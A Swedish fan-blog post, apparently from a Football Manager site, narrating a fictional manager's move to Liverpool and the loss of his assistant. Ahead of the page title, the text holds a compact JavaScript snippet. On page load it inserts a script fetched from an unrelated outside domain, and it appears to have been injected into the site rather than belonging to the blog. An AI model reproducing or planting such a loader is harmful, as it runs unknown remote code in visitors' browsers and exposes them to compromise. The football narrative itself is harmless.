;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Moderskeppet kallar!! – FMSweden
Meny Stäng

Moderskeppet kallar!!

När Devran NH Bagis stod i finalen mot Argentina, så visste han samtidigt att han skulle få dela på sig under kommande säsong. Han hade nämligen fått ytterligare ett klubbjobb!! I ett nytt land..

Framgångarna hade numera kommit i tätare följd och Devran NH Bagis var hett villebråd på marknaden igen.
Det var allt från Real Madrid, Juventus och Manchester United som hörde av sig till turkens agent, men det självklara valet föll till slut på en annan engelsk klubb.

Det var Melwood och Anfield som skulle bli Bagis hemvist den närmaste framtiden.
Då snackar vi givetvis om Liverpool F.C.

Klubben hade efter Jürgens Klopp uttåg haft flera olika managers, med olika framgång. Dock var det nu väldigt längesen man var med och slogs om ligatiteln. Liverpool blev faktiskt inte bättre än 8:a den senaste säsongen och nu var kraven på turken att ta tillbaka Liverpool till den absoluta toppen igen.

Kraven var att ta sig till Champions League-kvällar på Anfield igen. Helst genom ligan, men även genom att vinna Europa League.
Ekonomin var inte som den en gång varit och några större värvningar hade inte varit möjliga.
Dessutom skulle Bagis nu få klara sig utan sin följeslagare Daniel Nilsson. Nilsson hade flyttat hem till Munka-Ljungby igen för att ta upp fotbollskarriären igen.

Skulle turken klara sig på egen hand? Det återstår att se

Skål och Broccoli!!
Trevlig helg vänner

Tobbe

Please wait...

Liknande Inlägg

Lämna ett svar